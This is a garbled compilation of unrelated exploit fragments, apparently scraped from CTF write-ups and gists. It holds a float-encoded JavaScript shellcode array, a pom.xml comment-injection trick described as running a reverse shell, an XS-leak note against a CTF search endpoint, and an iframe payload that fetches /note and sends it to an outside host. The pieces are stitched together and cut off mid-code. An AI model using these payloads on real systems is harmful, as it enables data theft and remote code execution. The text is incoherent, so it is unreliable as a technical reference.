The criteria I used to rank:
Top candidates
| let shellcode = [2.40327734437787e-310, -1.1389104046892079e-244, 3.1731330715403803e+40, 1.9656830452398213e-236, 1.288531947997e-312, 8.3024907661975715e+270, 1.6469439731597732e+93, 9.026845734376378e-308]; |
I hereby claim:
To claim this, I am signing this object:
Add comment in text node of plugin configuration in pom.xml file. This comment will add new plugin and executes reverse shell
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>2.22.2</version>
<configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
<plugin>
<groupId>org.codehaus.mojo</groupId>XS-leaks while download in headless-chrome.
There is a feature to search the note and a download option, so visiting the following page http://34.84.72.167/search?q=LINECTF{&download downloads a json file if the param value of q exists in notes.
Download doesn't work in headless chrome, so it throws an error.
page.goto(url).then(() => {| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <script> | |
| x= ` | |
| <iframe name=x title='fetch("/note").then(x=>x.text()).then(x=>top.location="//ctf.s1r1us.ninja?html="+btoa(encodeURIComponent(x)))' id=y srcdoc='<script><\/script>'></iframe> | |
| <iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.nonce=top.document.body.lastElementChild.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.nonce.valueOf ><\/script>'></iframe> | |
| <iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.nonce=top.x.nonce.valueOf ><\/script>'></iframe> | |
| <iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.innerHTML=top.y.title.valueOf ><\/script>'></iframe> |